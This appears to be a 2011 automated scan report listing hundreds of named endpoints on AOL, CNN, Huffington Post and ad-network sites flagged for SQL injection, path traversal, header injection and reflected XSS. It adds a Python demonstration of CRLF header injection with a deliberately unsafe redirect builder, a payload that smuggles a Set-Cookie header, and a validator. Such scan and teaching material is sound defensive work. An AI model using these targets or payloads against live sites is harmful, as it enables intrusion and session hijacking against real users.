Report generated by XSS.CX at Thu May 05 15:44:47 CDT 2011.


XSS, Cross Site Scripting in aol http systems, CWE-79, CAPEC-86, DORK, GHDB



1. SQL injection

1.1. http://aol.sportingnews.com/ [name of an arbitrarily supplied request parameter]

1.2. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [dimension parameter]

1.3. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [limit parameter]

1.4. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [name of an arbitrarily supplied request parameter]

1.5. http://aol.sportingnews.com/services/sn-promos/yearbooks.php [name of an arbitrarily supplied request parameter]

1.6. http://o.aolcdn.com/os/fanhouse/design/v2/css/fanhouse.css [REST URL parameter 2]

1.7. http://o.aolcdn.com/os/fonts/helvetica_lt_77_bold_condensed-webfont.woff [REST URL parameter 3]

1.8. http://o.aolcdn.com/os/mobile-desktop/js/mobileblog.js [REST URL parameter 2]

1.9. http://o.aolcdn.com/os/realestate/favicon.ico [REST URL parameter 2]

1.10. http://o.aolcdn.com/os_merge/ [file parameter]

1.11. http://widgets.digg.com/buttons/count [url parameter]

1.12. http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter]

1.13. http://www.huffingtonpost.com/threeup.php [v parameter]

2. File path traversal

2.1. http://o.aolcdn.com/art/merge [f parameter]

2.2. http://o.aolcdn.com/art/merge/ [f parameter]

3. LDAP injection

4. HTTP header injection

4.1. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

4.2. http://ad.doubleclick.net/getcamphist [src parameter]

4.3. http://api.screenname.aol.com/auth/login [devId parameter]

4.4. http://api.screenname.aol.com/auth/login [f parameter]

4.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

4.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

4.7. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

4.8. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 2]

4.9. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 3]

4.10. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 4]

4.11. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 5]

4.12. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 6]

4.13. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 7]

4.14. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 2]

4.15. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 3]

4.16. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 4]

4.17. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 5]

4.18. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 6]

4.19. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 7]

4.20. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 2]

4.21. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 3]

4.22. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 4]

4.23. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 5]

4.24. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 6]

4.25. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 7]

4.26. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 2]

4.27. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 3]

4.28. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 4]

4.29. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 5]

4.30. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 6]

4.31. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 7]

4.32. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 2]

4.33. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 3]

4.34. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 4]

4.35. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 5]

4.36. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 6]

4.37. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 7]

4.38. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 2]

4.39. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 3]

4.40. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 4]

4.41. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 5]

4.42. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 6]

4.43. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 7]

4.44. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 8]

4.45. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 2]

4.46. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 3]

4.47. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 4]

4.48. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 5]

4.49. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 6]

4.50. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 7]

4.51. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 2]

4.52. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 3]

4.53. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 4]

4.54. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 5]

4.55. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 6]

4.56. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 7]

4.57. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 2]

4.58. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 3]

4.59. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 4]

4.60. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 5]

4.61. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 6]

4.62. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 7]

4.63. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 2]

4.64. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 3]

4.65. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 4]

4.66. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 5]

4.67. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 6]

4.68. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 7]

4.69. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 8]

4.70. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 2]

4.71. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 3]

4.72. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 4]

4.73. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 5]

4.74. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 6]

4.75. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 7]

4.76. http://my.screenname.aol.com/_cqr/login/login.psp [name of an arbitrarily supplied request parameter]

4.77. http://search.aol.com/aol/tracking [name of an arbitrarily supplied request parameter]

4.78. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

4.79. http://tacoda.at.atwola.com/rtx/r.js [si parameter]
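
Every entry in section 4 is a place where the scanner saw a request value (a query parameter, a REST URL segment, or a cookie) come back inside a response header. The Python below is an added example, not code from the XSS.CX report or from any of the sites listed: it shows the mechanism behind the finding class and the check that closes it. A redirect is built by string concatenation with the parameter copied straight into Location, the same redirect is built again after validation, and a small header parser confirms whether an injected header actually landed. The endpoint behaviour, the payload and the header names are constructed for illustration; the report lists no payloads or responses here, so each listed item still has to be confirmed by hand.

```python
"""CRLF header injection: how a reflected parameter becomes an attacker-controlled
response header, and the validation that stops it. Added example; none of the
endpoints in the report above are reproduced here."""
import re

# Bytes that must never appear inside an HTTP/1.1 header value.
_CTL = re.compile(r"[\r\n\x00]")


def vulnerable_redirect(target: str) -> bytes:
    """Build a raw 302 response by concatenation, with `target` copied straight
    from the request. Intentionally unsafe: it demonstrates the failure mode."""
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Location: {target}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("latin-1")


def safe_redirect(target: str) -> bytes:
    """Same construction, but reject any value carrying CR, LF or NUL before it
    reaches the header block. Scanners send these URL-encoded (%0d%0a); the web
    server decodes them before the application sees `target`, so the decoded
    value is what must be checked."""
    if _CTL.search(target):
        raise ValueError("control character in header value")
    return vulnerable_redirect(target)


def safe_redirect_rejects(target: str) -> bool:
    """True when safe_redirect refuses the value."""
    try:
        safe_redirect(target)
    except ValueError:
        return True
    return False


def parse_headers(raw: bytes) -> dict[str, list[str]]:
    """Parse a raw response the way a client does: one header per CRLF-separated
    line up to the first blank line. Repeated names are kept as a list."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers: dict[str, list[str]] = {}
    for line in lines[1:]:  # lines[0] is the status line
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def has_injected_header(raw: bytes, name: str) -> bool:
    """Detection step: did a header the application never meant to send appear?"""
    return name.lower() in parse_headers(raw)


# Constructed payload: a legitimate-looking redirect target, then CRLF and a
# header of the attacker's choosing. Appending "\r\n\r\n<html>..." would also
# terminate the header block and inject a body (HTTP response splitting).
CRLF_PAYLOAD = "http://example.test/\r\nSet-Cookie: injected=1"

if __name__ == "__main__":
    print(parse_headers(vulnerable_redirect(CRLF_PAYLOAD)))
    print("rejected by safe_redirect:", safe_redirect_rejects(CRLF_PAYLOAD))
```

Rejecting the value is the right fix at the application layer; percent-encoding the offending bytes instead would silently produce a broken redirect target. Modern frameworks and servers refuse CR/LF in header values for exactly this reason, which is why findings in this class usually involve hand-rolled header writing or a proxy or CDN layer in front of the application.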

5. Cross-site scripting (reflected)

5.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

5.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

5.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

5.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

5.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

5.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

5.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]

5.8. http://480-adver-view.c3metrics.com/v.js [id parameter]

5.9. http://480-adver-view.c3metrics.com/v.js [t parameter]

5.10. http://about.aol.com/aolnetwork/aol_pp [REST URL parameter 1]

5.11. http://about.aol.com/aolnetwork/aol_pp [REST URL parameter 2]

5.12. http://about.aol.com/aolnetwork/aolcom_terms [REST URL parameter 1]

5.13. http://about.aol.com/aolnetwork/aolcom_terms [REST URL parameter 2]

5.14. http://about.aol.com/aolnetwork/copyright_infringement [REST URL parameter 1]

5.15. http://about.aol.com/aolnetwork/copyright_infringement [REST URL parameter 2]

5.16. https://account.login.aol.com/_cqr/opr/opr.psp [authLev parameter]

5.17. https://account.login.aol.com/opr/_cqr/opr/opr.psp [authLev parameter]

5.18. http://ad.doubleclick.net/adj/huffpost.premium/front [name of an arbitrarily supplied request parameter]

5.19. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

5.20. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

5.21. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

5.22. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6 [mpt parameter]

5.23. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6 [mpvc parameter]

5.24. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6 [name of an arbitrarily supplied request parameter]

5.25. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0 [mpt parameter]

5.26. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0 [mpvc parameter]

5.27. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0 [name of an arbitrarily supplied request parameter]

5.28. http://aol.sportingnews.com/ [name of an arbitrarily supplied request parameter]

5.29. http://aol.sportingnews.com/iframe-widgets/feed/accordion.php [body-class parameter]

5.30. http://aol.sportingnews.com/iframe-widgets/feed/accordion.php [name of an arbitrarily supplied request parameter]

5.31. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [dimension parameter]

5.32. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [dimension parameter]

5.33. http://apartments.rentedspaces.oodle.com/ [name of an arbitrarily supplied request parameter]

5.34. http://apartments.rentedspaces.oodle.com/ [post_redirect parameter]

5.35. http://api.screenname.aol.com/auth/getToken [c parameter]

5.36. https://api.screenname.aol.com/auth/getToken [c parameter]

5.37. http://apps.conduit-banners.com/TechCrunchApp-Techcrunch_APP [imageurl parameter]

5.38. http://apps.conduit.com/TechCrunch_App-Techcrunch_News [REST URL parameter 1]

5.39. http://ar.voicefive.com/b/rc.pli [func parameter]

5.40. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 1]

5.41. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 2]

5.42. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 3]

5.43. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 4]

5.44. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 5]

5.45. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 6]

5.46. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 7]

5.47. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [name of an arbitrarily supplied request parameter]

5.48. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [noperf parameter]

5.49. http://b.scorecardresearch.com/beacon.js [c1 parameter]

5.50. http://b.scorecardresearch.com/beacon.js [c10 parameter]

5.51. http://b.scorecardresearch.com/beacon.js [c15 parameter]

5.52. http://b.scorecardresearch.com/beacon.js [c2 parameter]

5.53. http://b.scorecardresearch.com/beacon.js [c3 parameter]

5.54. http://b.scorecardresearch.com/beacon.js [c4 parameter]

5.55. http://b.scorecardresearch.com/beacon.js [c5 parameter]

5.56. http://b.scorecardresearch.com/beacon.js [c6 parameter]

5.57. http://bid.openx.net/json [c parameter]

5.58. http://c.aol.com/read/get_topics [callback parameter]

5.59. http://cdn4.eyewonder.com/cm/js/10295-119241-2568-4 [mpt parameter]

5.60. http://cdn4.eyewonder.com/cm/js/10295-119241-2568-4 [mpvc parameter]

5.61. http://cdn4.eyewonder.com/content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js [mpck parameter]

5.62. http://cdn4.eyewonder.com/content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js [mpvc parameter]

5.63. http://choices.truste.com/ca [c parameter]

5.64. http://choices.truste.com/ca [h parameter]

5.65. http://choices.truste.com/ca [iplc parameter]

5.66. http://choices.truste.com/ca [ox parameter]

5.67. http://choices.truste.com/ca [plc parameter]

5.68. http://choices.truste.com/ca [w parameter]

5.69. http://choices.truste.com/ca [zi parameter]

5.70. http://coverage.mqcdn.com/coverage [REST URL parameter 1]

5.71. http://coverage.mqcdn.com/coverage [cat parameter]

5.72. http://coverage.mqcdn.com/coverage [jsonp parameter]

5.73. http://coverage.mqcdn.com/coverage [name of an arbitrarily supplied request parameter]

5.74. http://d.tradex.openx.com/afr.php [cb parameter]

5.75. http://d.tradex.openx.com/afr.php [name of an arbitrarily supplied request parameter]

5.76. http://d.tradex.openx.com/afr.php [zoneid parameter]

5.77. http://dev.aol.com/ [name of an arbitrarily supplied request parameter]

5.78. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 1]

5.79. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 2]

5.80. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 3]

5.81. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 4]

5.82. http://digg.com/submit [REST URL parameter 1]

5.83. http://fantasysource.sportingnews.com/baseball/free [REST URL parameter 1]

5.84. http://fantasysource.sportingnews.com/baseball/free [REST URL parameter 2]

5.85. http://fantasysource.sportingnews.com/baseball/promo [REST URL parameter 1]

5.86. http://fantasysource.sportingnews.com/baseball/promo [REST URL parameter 2]

5.87. http://fantasysource.sportingnews.com/baseball/rankings [REST URL parameter 1]

5.88. http://fantasysource.sportingnews.com/baseball/rankings [REST URL parameter 2]

5.89. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 1]

5.90. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 2]

5.91. http://help.aol.com/help/microsites/search.do [name of an arbitrarily supplied request parameter]

5.92. http://image3.pubmatic.com/AdServer/UPug [pageURL parameter]

5.93. http://image3.pubmatic.com/AdServer/UPug [ran parameter]

5.94. http://img.mediaplex.com/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js [mpck parameter]

5.95. http://img.mediaplex.com/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js [mpck parameter]

5.96. http://img.mediaplex.com/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js [mpvc parameter]

5.97. http://img.mediaplex.com/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js [mpvc parameter]

5.98. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js [mpck parameter]

5.99. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js [mpck parameter]

5.100. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js [mpvc parameter]

5.101. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js [mpvc parameter]

5.102. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js [mpck parameter]

5.103. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js [mpck parameter]

5.104. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js [mpvc parameter]

5.105. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js [mpvc parameter]

5.106. http://mobile.aol.com/product/Android/dailyfinance/ [REST URL parameter 2]

5.107. http://mobile.aol.com/product/Android/dailyfinance/ [REST URL parameter 2]

5.108. http://mobile.aol.com/product/Android/dailyfinance/ [REST URL parameter 3]

5.109. http://mobile.aol.com/product/iPhone/Autos/ [REST URL parameter 2]

5.110. http://mobile.aol.com/product/iPhone/Autos/ [REST URL parameter 2]

5.111. http://mobile.aol.com/product/iPhone/Autos/ [REST URL parameter 3]

5.112. http://mobile.aol.com/product/iPhone/aim/ [REST URL parameter 2]

5.113. http://mobile.aol.com/product/iPhone/aim/ [REST URL parameter 2]

5.114. http://mobile.aol.com/product/iPhone/aim/ [REST URL parameter 3]

5.115. http://mobile.aol.com/product/iPhone/aol-radio/ [REST URL parameter 2]

5.116. http://mobile.aol.com/product/iPhone/aol-radio/ [REST URL parameter 2]

5.117. http://mobile.aol.com/product/iPhone/aol-radio/ [REST URL parameter 3]

5.118. http://mobile.aol.com/product/iPhone/daily-finance/ [REST URL parameter 2]

5.119. http://mobile.aol.com/product/iPhone/daily-finance/ [REST URL parameter 2]

5.120. http://mobile.aol.com/product/iPhone/daily-finance/ [REST URL parameter 3]

5.121. http://mobile.aol.com/product/iPhone/engadget/ [REST URL parameter 2]

5.122. http://mobile.aol.com/product/iPhone/engadget/ [REST URL parameter 2]

5.123. http://mobile.aol.com/product/iPhone/engadget/ [REST URL parameter 3]

5.124. http://mobile.aol.com/product/iPhone/iPad/ [REST URL parameter 2]

5.125. http://mobile.aol.com/product/iPhone/iPad/ [REST URL parameter 2]

5.126. http://mobile.aol.com/product/iPhone/iPad/ [REST URL parameter 3]

5.127. http://mobile.aol.com/product/iPhone/mail/ [REST URL parameter 2]

5.128. http://mobile.aol.com/product/iPhone/mail/ [REST URL parameter 2]

5.129. http://mobile.aol.com/product/iPhone/mail/ [REST URL parameter 3]

5.130. http://mobile.aol.com/product/iPhone/search/ [REST URL parameter 2]

5.131. http://mobile.aol.com/product/iPhone/search/ [REST URL parameter 2]

5.132. http://mobile.aol.com/product/iPhone/search/ [REST URL parameter 3]

5.133. http://music.aol.com/radioguide/bb [REST URL parameter 2]

5.134. http://music.aol.com/radioguide/bb [REST URL parameter 2]

5.135. http://my.screenname.aol.com/_cqr/login/checkStatus.psp [cb parameter]

5.136. https://my.screenname.aol.com/_cqr/login/login.psp [authLev parameter]

5.137. https://my.screenname.aol.com/_cqr/login/login.psp [authLev parameter]

5.138. https://my.screenname.aol.com/_cqr/login/login.psp [authLev parameter]

5.139. https://my.screenname.aol.com/_cqr/login/login.psp [createSn parameter]

5.140. https://my.screenname.aol.com/_cqr/login/login.psp [name of an arbitrarily supplied request parameter]

5.141. https://my.screenname.aol.com/_cqr/login/login.psp [offerId parameter]

5.142. https://my.screenname.aol.com/_cqr/login/login.psp [siteState parameter]

5.143. https://my.screenname.aol.com/_cqr/login/login.psp [uitype parameter]

5.144. https://my.screenname.aol.com/_cqr/logout/mcLogout.psp [authLev parameter]

5.145. https://my.screenname.aol.com/_cqr/logout/mcLogout.psp [brandless parameter]

5.146. https://my.screenname.aol.com/badbrowser.psp [authLev parameter]

5.147. https://my.screenname.aol.com/badbrowser.psp [authLev parameter]

5.148. https://my.screenname.aol.com/badbrowser.psp [offerId parameter]

5.149. https://my.screenname.aol.com/badbrowser.psp [offerId parameter]

5.150. https://my.screenname.aol.com/badbrowser.psp [sitedomain parameter]

5.151. https://my.screenname.aol.com/badbrowser.psp [sitedomain parameter]

5.152. http://o.aolcdn.com/smartbox/SBG/REST/ [callback parameter]

5.153. http://pglb.buzzfed.com/10032/f4f3ccafe3fc01872a82127ebf3deddd [callback parameter]

5.154. http://portal.pf.aol.com/jsonmfus/ws [callback parameter]

5.155. http://portal.pf.aol.com/jsonqpus/ws [callback parameter]

5.156. http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/ [name of an arbitrarily supplied request parameter]

5.157. http://realestate.aol.com/blog/rental-listings [REST URL parameter 2]

5.158. http://search.twitter.com/search [q parameter]

5.159. http://sportingnews.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

5.160. http://view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

5.161. http://view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

5.162. http://view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

5.163. http://view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

5.164. http://view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

5.165. http://view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

5.166. http://view.c3metrics.com/v.js [cid parameter]

5.167. http://view.c3metrics.com/v.js [id parameter]

5.168. http://view.c3metrics.com/v.js [t parameter]

5.169. http://www.aolnews.com/category/goodnews/ [REST URL parameter 2]

5.170. http://www.bankrate.com/funnel/mortgages/ [name of an arbitrarily supplied request parameter]

5.171. http://www.citysbest.com/ [icid parameter]

5.172. http://www.citysbest.com/ [name of an arbitrarily supplied request parameter]

5.173. http://www.citysbest.com/traffic/ [REST URL parameter 1]

5.174. http://www.citysbest.com/traffic/ [REST URL parameter 1]

5.175. http://www.dailyfinance.com/markets/mostactives [REST URL parameter 2]

5.176. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [REST URL parameter 2]

5.177. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [name of an arbitrarily supplied request parameter]

5.178. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [REST URL parameter 3]

5.179. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [name of an arbitrarily supplied request parameter]

5.180. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [REST URL parameter 3]

5.181. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [name of an arbitrarily supplied request parameter]

5.182. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [REST URL parameter 3]

5.183. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [name of an arbitrarily supplied request parameter]

5.184. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

5.185. http://www.huffingtonpost.com/ [icid parameter]

5.186. http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter]

5.187. http://www.huffingtonpost.com/2011/05/02/ [name of an arbitrarily supplied request parameter]

5.188. http://www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html [name of an arbitrarily supplied request parameter]

5.189. http://www.huffingtonpost.com/2011/05/04/ [name of an arbitrarily supplied request parameter]

5.190. http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html [name of an arbitrarily supplied request parameter]

5.191. http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html [name of an arbitrarily supplied request parameter]

5.192. http://www.huffingtonpost.com/ads/check_flights.php [name of an arbitrarily supplied request parameter]

5.193. http://www.huffingtonpost.com/ads/check_flights.php [spot parameter]

5.194. http://www.huffingtonpost.com/advertise/ [name of an arbitrarily supplied request parameter]

5.195. http://www.huffingtonpost.com/badge/badges_json_v2.php [cb parameter]

5.196. http://www.huffingtonpost.com/badge/badges_json_v2.php [gn parameter]

5.197. http://www.huffingtonpost.com/badge/badges_json_v2.php [sn parameter]

5.198. http://www.huffingtonpost.com/permalink-tracker.html [vertical parameter]

5.199. http://www.huffingtonpost.com/users/logout/ [name of an arbitrarily supplied request parameter]

5.200. http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 1]

5.201. http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 2]

5.202. http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter]

5.203. http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter]

5.204. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter]

5.205. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter]

